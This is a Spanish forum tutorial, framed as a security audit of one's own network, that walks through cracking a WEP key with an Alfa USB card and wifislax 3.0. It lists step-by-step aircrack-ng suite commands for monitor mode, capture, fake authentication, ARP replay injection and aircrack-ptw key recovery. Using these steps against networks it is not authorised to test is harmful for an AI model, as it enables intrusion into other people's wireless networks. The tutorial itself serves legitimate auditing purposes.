Nota: El proceso en cuestión trata de como obtener de forma rápida y sencilla una recuperación de claves de nuestra propia red wireless (análisis de seguridad de nuestra instalación) en la cual no se presenta ningún cliente conectado previo y por lo tanto efectuamos una autenticación falsa o comúnmente ataque 1 previo paso para efectuar la reinyección de trafico con el ataque 3.

Queda perfectamente demostrado nuevamente que el estándar de seguridad wireless con cifrado WEP esta obsoleto y se recomienda encarecidamente que se use el estándar de seguridad con cifrado WPA, vease tutorial de configuración básico de WPA. A la par que queda demostrado que dicha tarjeta usb es apta y valida para la auditoria wireless.

EL uso que se le pueda dar a esta manual para fines delictivos escapa de nuestra competencia, porque creo que todos sabéis de sobras que nuestras presentaciones siempre han sido dirigidas a todas aquellas personas que quieren comprobar la seguridad de sus instalaciones wireless, en todo nuestros portales y en nuestros foros no se aprueba y no se da soporte de intrusión a redes ajenas, temáticas que siempre serán bloqueadas y/o eliminadas aunque nos lleve consigo problemas derivados con muchas personas que todavía no entienden el porque de nuestra existencia. En ese sentido somos muy estrictos y como modelo de ejemplo nombro a Unbas, altamente criticado por sus actuaciones aludiendo a pequeños fragmentos sacados de contexto y lo que es mas grave faltando a la verdad.

Sin mas preámbulos os presento el tutorial de  inyección de la tarjeta Alfa usb 500mw con wifislax 3.0 desarrollado por el compañero ainza redactado en primera persona, el cual simplemente he tenido que copiar del foro.

Inyectando con tarjeta wireless Alfa usb 500mw y wifislax 3.0

 1.- Chequeando la  tarjeta ( iwconfig wlan0 )

2.- Corriendo el airmon-ng en el canal 6 ( airmon-ng start wlan0 6 )

3.- Chequeando la tarjeta ya en modo monitor en el canal 6 ( iwconfig wlan0 )

4.- Corriendo el airdump-ng en el canal 6 ( airdump-ng -w aaaa -c6 wlan0 )

5.- Empezando a capturar paquetes

6.- Aplicando la asosiacion ( aireplay-ng -1 30 -e xxxx -a MAC -h MAC wlan0 )

7.- Empezando a inyectar paquetes (aireplay-ng -3 -x600 -b MAC -h MAC wlan0 )

9.- Pueden ver que esta inyectando 500 paquetes

10.- En 3 minutos ya tenemos 100,000 IVS para comprobar la seguridad de nuestra red wireless con aircrack-ptw

11.- Recuperación optima de claves: aircrack-ptw archivo.cap

Nota por mi parte: Sin comentarios porque las capturas del proceso y los párrafos en la cabecera de cada imagen, son lo suficientemente aclaratorios, buen trabajo.

Añadimos una capturas mas que tenemos:

Tomada por ChimoC, observar el valor de inyección = 858 por segundo